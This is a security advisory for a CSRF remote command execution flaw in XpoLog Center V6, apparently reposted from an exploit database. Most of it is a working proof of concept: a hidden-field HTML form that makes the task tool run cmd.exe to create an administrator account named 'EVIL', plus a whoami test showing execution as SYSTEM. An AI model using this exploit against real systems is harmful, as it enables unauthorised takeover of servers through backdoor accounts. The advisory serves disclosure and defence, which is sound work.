###########################

# XpoLog Center V6 CSRF Remote Command Execution Vulnerability

###########################

XpoLog Center V6 CSRF Remote Command Execution


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.

Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php


14.06.2016

--


exePath = "C:\windows\system32\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"

<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value="&quot;c&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;cmd&#46;exe&quot;" />
<input type="hidden" name="exeArgs" value="&quot;&#47;C&#32;net&#32;user&#32;EVIL&#32;pass123&#32;&#47;add&#32;&#38;&#32;net&#32;localgroup&#32;Administrators&#32;EVIL&#32;&#47;add&quot;" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId&#95;1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId&#95;1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="jobPriority" value="&#45;1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

--

exePath = "C:\windows\system32\cmd.exe"
exeArgs = "/C whoami > c:\Progra~1\XpoLogCenter6\defaultroot\logeye\testingus.txt"


GET
http://10.0.0.17:30303/logeye/testingus.txt

Response:

nt authoritysystem

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-07-23]

###########################